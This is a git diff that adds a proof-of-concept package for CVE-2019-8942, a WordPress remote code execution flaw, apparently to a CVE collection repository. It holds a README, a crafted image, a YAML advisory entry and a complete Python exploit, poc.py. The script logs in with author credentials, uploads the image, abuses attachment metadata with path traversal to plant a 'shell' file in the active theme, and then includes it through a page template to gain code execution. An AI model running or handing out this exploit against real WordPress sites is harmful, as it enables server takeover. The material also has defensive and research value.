diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md new file mode 100644 index 0000000000000000000000000000000000000000..812c6782f3e13fe88129d6473da8abbd4d303308 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -0,0 +1,28 @@ +# CVE-2019-8942 Proof-of-Concept + +### Overview + +WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. +For a comprehensive understanding, check out the accompanying [blog post](http://blog.nsfocus.net/wordpress-5-0-0-rce/) for in-depth details. + +### Dependencies + +* python3 +* requests package + +### Usage + +1. Verify if requests is installed: +``` +sudo pip3 install requests +``` + +2. Modify the "url_root" in poc.py as you wish, for example: +``` +url_root = 'http://localhost/' +``` + +3. Run the PoC: +``` +python3 ./poc.py +``` \ No newline at end of file diff --git a/cve/WordPress/2019/CVE-2019-8942/imagick.jpg b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26bf6fdc1ad140fd556848ef597d11d9a38efc15 Binary files /dev/null and b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg differ diff --git a/cve/WordPress/2019/CVE-2019-8942/poc.py b/cve/WordPress/2019/CVE-2019-8942/poc.py new file mode 100644 index 0000000000000000000000000000000000000000..853e4d08c6f54b2e4deba6c5d2918648051dbfc8 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/poc.py @@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml new file mode 100644 index 0000000000000000000000000000000000000000..4223ef65fc6d4cb17e9e9d205871bc2243a17f30 --- /dev/null +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-8942 +source: + https://github.com/synacktiv/CVE-2019-8942 +info: + name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 + severity: high + description: | + WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. + scope-of-influence: + WordPress < 4.9.9 + WordPress 5.x < 5.0.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-8942 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-8942 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE, 远程代码执行 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index fc7663c89bd57e1472b6072d7ca583e1c6d5cb50..a1c0e3e27e5a285db2d2cccd8db83c017da2b920 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -45,4 +45,6 @@ cve: - CVE-2022-23131 Zyxel: - CVE-2022-30525 + WordPress: + - CVE-2019-8942 cnvd: